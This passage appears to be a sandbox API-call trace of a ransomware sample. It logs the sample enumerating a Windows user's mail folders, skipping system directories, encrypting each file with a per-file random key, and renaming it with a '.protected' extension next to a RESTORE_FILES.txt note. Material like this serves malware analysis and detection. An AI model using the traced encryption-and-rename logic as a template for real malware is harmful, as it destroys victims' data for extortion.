(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.393] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 [0085.393] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.402] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.402] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.403] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.406] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.406] CloseHandle (hObject=0x14c) returned 1 [0085.406] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected") returned 93 [0085.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log.protected")) returned 1 [0085.408] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Windows") returned -1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files") returned -1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files (x86)") returned -1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="$Recycle.bin") returned 1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="System Volume Information") returned -1 [0085.408] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.408] StrStrIW (lpFirst="edbres00001.jrs", lpSrch=".protected") returned 0x0 [0085.408] lstrcmpW (lpString1="edbres00001.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0085.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.409] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".txt") returned 0x0 [0085.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.409] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".rar") returned 0x0 [0085.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.409] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".zip") returned 0x0 [0085.409] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.411] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.411] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.411] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.411] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.412] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.413] CloseHandle (hObject=0x14c) returned 1 [0085.420] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected") returned 96 [0085.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.protected")) returned 1 [0085.421] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Windows") returned -1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files") returned -1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files (x86)") returned -1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="$Recycle.bin") returned 1 [0085.422] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="System Volume Information") returned -1 [0085.422] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.422] StrStrIW (lpFirst="edbres00002.jrs", lpSrch=".protected") returned 0x0 [0085.422] lstrcmpW (lpString1="edbres00002.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0085.422] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.422] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.423] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".txt") returned 0x0 [0085.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.423] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".rar") returned 0x0 [0085.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.423] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".zip") returned 0x0 [0085.423] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.433] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.433] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.434] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.434] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.436] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.436] CloseHandle (hObject=0x14c) returned 1 [0085.436] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected") returned 96 [0085.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.protected")) returned 1 [0085.438] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="Windows") returned -1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files") returned -1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files (x86)") returned -1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="$Recycle.bin") returned 1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="System Volume Information") returned -1 [0085.438] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.438] StrStrIW (lpFirst="oeold.xml", lpSrch=".protected") returned 0x0 [0085.438] lstrcmpW (lpString1="oeold.xml", lpString2="RESTORE_FILES.txt") returned -1 [0085.438] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.438] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.439] StrStrW (lpFirst="oeold.xml", lpSrch=".txt") returned 0x0 [0085.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.439] StrStrW (lpFirst="oeold.xml", lpSrch=".rar") returned 0x0 [0085.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.439] StrStrW (lpFirst="oeold.xml", lpSrch=".zip") returned 0x0 [0085.439] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0085.440] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.440] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0085.440] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.440] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.441] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.441] CloseHandle (hObject=0x14c) returned 1 [0085.441] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected") returned 90 [0085.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml.protected")) returned 1 [0085.442] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="Windows") returned -1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="Program Files") returned 1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="Program Files (x86)") returned 1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="$Recycle.bin") returned 1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="System Volume Information") returned -1 [0085.442] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 81 [0085.442] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0085.442] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0085.442] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned 83 [0085.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.454] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.454] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.454] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.454] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.454] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.454] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.") returned 83 [0085.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.454] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0085.454] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0085.454] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.454] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.455] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.455] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.455] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.455] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.455] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.455] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\..") returned 84 [0085.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.455] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0085.455] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0085.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.455] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="Windows") returned -1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files") returned -1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files (x86)") returned -1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="$Recycle.bin") returned 1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="System Volume Information") returned -1 [0085.455] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.455] StrStrIW (lpFirst="Bears.htm", lpSrch=".protected") returned 0x0 [0085.455] lstrcmpW (lpString1="Bears.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.456] StrStrW (lpFirst="Bears.htm", lpSrch=".txt") returned 0x0 [0085.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.456] StrStrW (lpFirst="Bears.htm", lpSrch=".rar") returned 0x0 [0085.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.456] StrStrW (lpFirst="Bears.htm", lpSrch=".zip") returned 0x0 [0085.456] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0085.458] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.458] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0085.458] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.458] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.458] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.458] CloseHandle (hObject=0x150) returned 1 [0085.459] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected") returned 101 [0085.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.protected")) returned 1 [0085.460] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="Windows") returned -1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files") returned -1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files (x86)") returned -1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="$Recycle.bin") returned 1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="System Volume Information") returned -1 [0085.460] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.460] StrStrIW (lpFirst="Bears.jpg", lpSrch=".protected") returned 0x0 [0085.460] lstrcmpW (lpString1="Bears.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.460] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: 